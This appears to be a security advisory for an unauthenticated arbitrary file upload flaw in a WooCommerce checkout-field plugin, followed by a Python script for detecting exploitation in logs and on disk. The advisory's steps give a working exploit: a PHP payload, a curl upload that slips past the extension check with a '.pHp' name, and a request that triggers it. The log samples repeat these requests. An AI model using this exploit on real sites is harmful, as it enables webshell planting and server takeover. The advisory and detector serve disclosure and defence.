wpexploit (Cydave) WPEX-ID:4DC72CD2-81D7-4A66-86BD-C9CFAF690EED
History: Feb 13, 2023 - 12:00 a.m.

WooCommerce Checkout Field Manager < 18.0 - Unauthenticated Arbitrary File Upload

Published: 2023-02-13 00:00:00
Author: cydave
Tags: woocommerce, unauthenticated, arbitrary file upload

EPSS: 0.192 (percentile 96.4%)

The plugin does not validate the files it accepts for upload, so an unauthenticated attacker can upload arbitrary files, including PHP scripts, to the server and then execute them.

1. Install and activate WooCommerce (dependency, no setup required).
2. Install and activate the vulnerable plugin (n-media-woocommerce-checkout-fields, version 17.2; per the title, every release below 18.0 is affected).
3. Prepare the payload:

echo '<?php passthru("id"); ?>' > /tmp/payload.php

4. Invoke the following curl command to upload the payload. Note that the name parameter uses the mixed-case extension ".pHp": this is what gets the upload past the plugin's extension check, while the file is still stored and executed as payload.php, as step 5 shows. The endpoint is admin-ajax.php and no cookie or nonce is sent, which is why the issue is unauthenticated:

curl -i 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=cfom_upload_file&name=payload.pHp' \
    -F 'file=@/tmp/payload.php'

5. Trigger the payload. A successful run returns HTTP 200 with the output of id (the web server's user and groups) in the body:

curl -i 'http://127.0.0.1:7777/wp-content/uploads/cfom_files/payload.php'
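
Once the PoC is confirmed, the other side of this advisory is finding out whether anyone has already used it. The Python below is an added example, not part of the wpexploit write-up or of the plugin's own code: it parses combined-format access log lines for requests to the cfom_upload_file AJAX action (flagging names with an executable extension, compared case-insensitively so the .pHp trick is caught) and for requests to PHP files under the cfom_files upload directory, and it lists any executable files already sitting in that directory. The action name and the upload path come from the PoC above; the log lines are constructed for this example, and the extension list is an assumption about which suffixes a typical PHP handler configuration executes.

```python
"""Triage helpers for the cfom_upload_file arbitrary-upload issue.

Added example, not part of the wpexploit advisory or the plugin. The log
lines below are constructed; the AJAX action and upload directory are the
ones used by the advisory's proof of concept.
"""
import os
import re
import tempfile
from pathlib import Path
from urllib.parse import parse_qs, urlsplit

# Assumption: suffixes a typical PHP handler hands to the interpreter. They are
# compared case-insensitively, so "payload.pHp" from the PoC is still caught.
EXEC_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}
UPLOAD_ACTION = "cfom_upload_file"                 # from the PoC URL
UPLOAD_DIR = "/wp-content/uploads/cfom_files/"     # from the PoC trigger step

# Apache/nginx combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)

# Constructed sample: one exploitation sequence, one legitimate upload, one unrelated hit.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Feb/2023:12:00:01 +0000] "POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=payload.pHp HTTP/1.1" 200 12 "-" "curl/7.88.1"',
    '203.0.113.5 - - [13/Feb/2023:12:00:02 +0000] "GET /wp-content/uploads/cfom_files/payload.php HTTP/1.1" 200 54 "-" "curl/7.88.1"',
    '198.51.100.7 - - [13/Feb/2023:12:05:00 +0000] "POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=id_scan.pdf HTTP/1.1" 200 12 "https://shop.example/checkout" "Mozilla/5.0"',
    '198.51.100.8 - - [13/Feb/2023:12:06:00 +0000] "GET /index.php HTTP/1.1" 200 3211 "-" "Mozilla/5.0"',
]


def has_exec_extension(name):
    """True if the file name's suffix would be executed by PHP (case-insensitive)."""
    return Path(name).suffix.lower() in EXEC_EXTENSIONS


def classify(line):
    """Return (ip, kind, detail) for a log line of interest, else None.

    kind is one of:
      upload-exec-extension  - cfom_upload_file call whose name has a PHP suffix
      upload                 - cfom_upload_file call with a harmless-looking name
      webshell-request       - request for a PHP file inside the cfom_files directory
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    ip, status = m["ip"], int(m["status"])
    if url.path.endswith("/wp-admin/admin-ajax.php"):
        query = parse_qs(url.query)
        if query.get("action", [""])[0] == UPLOAD_ACTION:
            name = query.get("name", [""])[0]
            kind = "upload-exec-extension" if has_exec_extension(name) else "upload"
            return (ip, kind, name)
    if url.path.startswith(UPLOAD_DIR) and has_exec_extension(url.path):
        return (ip, "webshell-request", f"{url.path} ({status})")
    return None


def triage(lines):
    """All findings from an iterable of log lines, in log order."""
    return [f for f in map(classify, lines) if f is not None]


def scan_upload_dir(root):
    """Sorted paths of files under root that would run as PHP; run this on
    wp-content/uploads/cfom_files on a site that had the vulnerable version."""
    hits = []
    for dirpath, _, files in os.walk(root):
        hits.extend(os.path.join(dirpath, f) for f in files if has_exec_extension(f))
    return sorted(hits)


def demo_scan():
    """Exercise scan_upload_dir on a throwaway directory of constructed files."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "2023", "02"))
        for rel in ("receipt.pdf", "payload.php", "2023/02/x.PhAr"):
            Path(tmp, rel).write_text("")
        return [os.path.relpath(p, tmp) for p in scan_upload_dir(tmp)]


if __name__ == "__main__":
    for ip, kind, detail in triage(SAMPLE_LOG):
        print(f"{ip:15} {kind:22} {detail}")
    print("on-disk hits in demo directory:", demo_scan())
```

The upload finding and the later GET from the same source address are the pair to look for: an upload-exec-extension event followed by a 200 on a PHP file under cfom_files means the shell was dropped and reached. Any executable file reported by the directory scan should be treated as a webshell until proven otherwise.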

